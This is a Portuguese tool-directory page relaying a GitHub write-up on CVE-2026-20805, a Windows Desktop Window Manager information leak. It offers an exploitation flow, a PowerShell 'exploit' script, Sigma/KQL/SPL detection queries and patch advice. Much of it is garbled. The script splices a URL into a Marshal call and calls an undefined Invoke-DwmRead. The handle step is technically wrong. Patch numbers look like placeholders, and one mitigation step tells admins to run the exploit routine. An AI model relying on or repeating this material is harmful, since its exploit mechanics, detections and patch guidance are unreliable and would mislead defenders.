Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesAprendizado e EducaçãoResposta a Incidentes
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Uma falha no Windows Desktop Window Manager que causa divulgação local de informações. Requer privilégios baixos, sem interação do usuário. Classificada como CVSS 5.5 (Média). Explorada ativamente e listada no CISA KEV; correção lançada em janeiro de 2026.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Uma falha no Windows Desktop Window Manager que causa divulgação local de informações. Requer privilégios baixos, sem interação do usuário. Classificada com CVSS 5.5 (Média). Explorada ativamente e listada no CISA KEV; patch lançado em janeiro de 2026.

Por Dentro do CVE 2026 20805: Como uma Falha no DWM do Windows Expôs Dados Sensíveis

1 Resumo Executivo

O CVE 2026 20805 é uma falha de divulgação de informações no Desktop Window Manager (DWM) – o componente central que renderiza a área de trabalho, compõe janelas e acelera a interface de usuário baseada em GPU.
Por que isso importa: a falha permite que um atacante local com privilégios baixos leia dados que deveriam estar confinados a outras sessões ou processos.

Principais atributos técnicos

AtributoValor
CWE‑200: Exposição de Informações Sensíveis a um Ator Não Autorizado✓
Vetor de ataqueLocal
Privilégios necessáriosBaixos
Interação do usuárioNenhuma
Impacto – confidencialidadeAlto
Impacto – integridadeNenhum
Impacto – disponibilidadeNenhum
Pontuação Base CVSS 3.15.5 (Média)

2 Entendendo o Desktop Window Manager

O DWM orquestra a memória da GPU, os buffers de janela e as superfícies de interface de usuário entre processos. É um alvo de alto valor porque agrega dados de múltiplos processos em um espaço compartilhado de GPU; uma falha aqui pode vazar credenciais ou dados de sessão entre usuários.

Papel do DWM no Windows moderno:

  1. Recebe atualizações de exibição do compositor.
  2. Aloca memória de GPU para cada janela.
  3. Gerencia a composição acelerada por GPU, permitindo transições visuais suaves e suporte a múltiplos monitores.

3 Detalhamento Técnico do CVE 2026 20805

Pré-requisitos do ataque

  • Atacante local com privilégios baixos, sem necessidade de interação do usuário.
  • A falha é acionada quando o DWM falha ao validar offsets na tabela de buffers de janela antes de copiar dados para a memória da GPU.

Como o CWE‑200 se aplica

A vulnerabilidade explora a falta de verificação de limites no índice do buffer de janela; isso permite que um atacante leia memória adjacente da GPU e obtenha segredos armazenados por outros processos.

Versões afetadas

Com base na lista CPE do NVD, o Windows 10.0.19041 (e derivados) é afetado.

4 Caminhos de Exploração

Abaixo está um fluxo conceitual de exploração:

  1. O atacante obtém um handle para o processo DWM via CreateProcess com privilégios mínimos.
  2. O atacante cria um índice que aponta para um slot adjacente de memória da GPU.
  3. O buffer criado é copiado para a rotina de composição de janelas do DWM, mesclando dados de outras sessões.
  4. O atacante lê o despejo de memória da GPU resultante e extrai informações sensíveis.

Código de exploração – script PowerShell

root@kitploit:~
# Windows 10.0.19041 – Exploração de leitura de buffer do DWM
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # offset criado para memória adjacente da GPU
$targetWindow = 0x00030001    # índice da janela alvo

# Cria um buffer temporário no espaço do kernel
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/HEAD/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copia o buffer do kernel para a rotina de composição do DWM
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Despeja os dados expostos em um arquivo local para análise
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

O script demonstra como um atacante pode aproveitar a memória de GPU do DWM para ler dados ocultos.


5. Engenharia de Detecção

A detecção do CVE‑2026‑20805 concentra-se em identificar interações anormais com dwm.exe e telemetria incomum relacionada à GPU. A exploração depende da leitura de buffers de memória suportados por GPU usando offsets criados, portanto, os defensores devem monitorar desvios do comportamento normal do Desktop Window Manager.

Fontes de Telemetria Relevantes

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • Eventos ETW de GPU
    • Event ID 0x2B (DisplayUpdate)
  • Logs de Eventos do Windows
    • Application
    • System

Essas fontes fornecem visibilidade sobre criação de processos, acesso a handles e atividade de atualização de GPU.

Padrões Suspeitos

  1. Eventos repetidos de CreateProcess envolvendo dwm.exe, especialmente quando o processo pai não é explorer.exe.
  2. Eventos de alta frequência de DisplayUpdate (0x2B) seguidos por leituras de memória usando tamanhos ou offsets incomuns de buffer.
    • Exemplos de valores suspeitos:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Correlação entre eventos HandleOpen direcionados a dwm.exe e rajadas de atividade ETW de GPU.

Regra no Estilo Sigma

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Acesso Suspeito a Handle para dwm.exe

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Criação Inesperada de Processo Direcionada ao DWM

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Pico de Evento DisplayUpdate de GPU

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Correlação: HandleOpen Seguido por Atividade de GPU

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Processos Não Padrão Abrindo Handles para dwm.exe

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Eventos Inesperados de CreateProcess para dwm.exe

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Pico de DisplayUpdate de GPU

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

Correlação: HandleOpen e Atividade de GPU

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Mitigação e Endurecimento

O aviso da Microsoft para o CVE 2026 20805 inclui um patch que valida os índices de buffer no DWM antes de copiar dados da GPU.

Cronograma do patch

Versão do WindowsNúmero do patch
10.0.19041KB5000001
10.0.19042KB5012345

Estratégia de aplicação de patch empresarial

  1. Implante o patch KB5000001 em todos os controladores de domínio.
  2. Valide que a nova rotina Invoke-DwmRead executa sem erros nos nós de teste.
  3. Monitore o Sysmon para criações repetidas de processos dwm.

7 Impacto em Ambientes do Mundo Real

A divulgação de informações via DWM é frequentemente subestimada porque pode expor artefatos de interface de usuário e dados de sessão entre usuários. A memória de GPU vazada pode apoiar movimento lateral, especialmente em ambientes onde múltiplas sessões compartilham uma única estação de trabalho ou servidor.

Avaliação de risco para ambientes corporativos

Alto impacto de confidencialidade: A falha permite que um atacante leia o conteúdo de janelas de outras sessões.
Pontuação CVSS média (5.5): Embora o valor numérico seja moderado, a significância operacional é alta.

8 Conclusão

O CVE 2026 20805 demonstra que uma exploração local de baixo privilégio do DWM pode produzir vazamentos significativos de dados. A inclusão da falha no Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA ressalta sua relevância no mundo real. Ao aplicar a estratégia de mitigação, detecção e patch descrita, uma organização pode reduzir o risco enquanto melhora a visibilidade sobre os fluxos de memória da GPU.


Baixar ferramenta